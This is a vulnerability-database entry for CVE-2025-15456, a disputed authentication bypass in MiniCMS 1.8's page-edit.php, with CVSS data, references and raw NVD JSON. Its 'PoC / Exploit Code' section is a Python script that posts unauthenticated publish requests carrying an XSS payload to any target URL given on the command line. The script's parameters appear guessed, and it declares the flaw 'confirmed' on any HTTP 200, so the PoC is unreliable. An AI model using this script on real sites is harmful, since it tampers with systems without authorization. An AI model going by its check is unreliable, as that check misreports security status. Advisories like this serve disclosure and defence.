CVE-2025-15456

Description

A vulnerability has been found in bg5sbk MiniCMS up to 1.8. The affected element is an unknown function of the file /mc-admin/page-edit.php of the component Publish Page Handler. Such manipulation leads to improper authentication. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The existence of this vulnerability is still disputed at present. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:1234n:minicms:*:*:*:*:*:*:*:* - VULNERABLE

bg5sbk MiniCMS <= 1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15456 PoC - MiniCMS Authentication Bypass
# Target: /mc-admin/page-edit.php

def exploit_minicms(target_url):
    """
    Exploit for MiniCMS <= 1.8 authentication bypass in page-edit.php
    Target component: Publish Page Handler
    """
    target = target_url.rstrip('/')
    
    # Step 1: Access page-edit.php without authentication
    page_edit_url = f"{target}/mc-admin/page-edit.php"
    
    # Step 2: Craft malicious request to bypass authentication
    # The vulnerability allows direct access to admin functions
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Step 3: Attempt to publish/modify page without auth
    # Modify 'page' parameter with malicious content
    data = {
        'action': 'publish',
        'page': 'test',
        'content': '<script>alert("XSS")</script>'
    }
    
    try:
        response = requests.post(page_edit_url, data=data, headers=headers, timeout=10)
        print(f"[*] Request sent to: {page_edit_url}")
        print(f"[*] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Potential vulnerability confirmed - endpoint accessible")
            print(f"[+] Response length: {len(response.text)} bytes")
        else:
            print("[-] Endpoint not accessible or protected")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    exploit_minicms(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15456
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15456
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15456/
[4] VulDB https://vuldb.com/cve/CVE-2025-15456
[5] https://github.com/ueh1013/VULN/issues/13
[6] https://vuldb.com/?ctiid.339489
[7] https://vuldb.com/?id.339489
[8] https://vuldb.com/?submit.725138

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15456", "sourceIdentifier": "[email protected]", "published": "2026-01-05T05:15:53.007", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in bg5sbk MiniCMS up to 1.8. The affected element is an unknown function of the file /mc-admin/page-edit.php of the component Publish Page Handler. Such manipulation leads to improper authentication. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The existence of this vulnerability is still disputed at present. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:1234n:minicms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.8", "matchCriteriaId": "BF8A0973-9280-4D64-8535-D2F7A88E613E"}]}]}], "references": [{"url": "https://github.com/ueh1013/VULN/issues/13", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339489", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339489", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725138", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}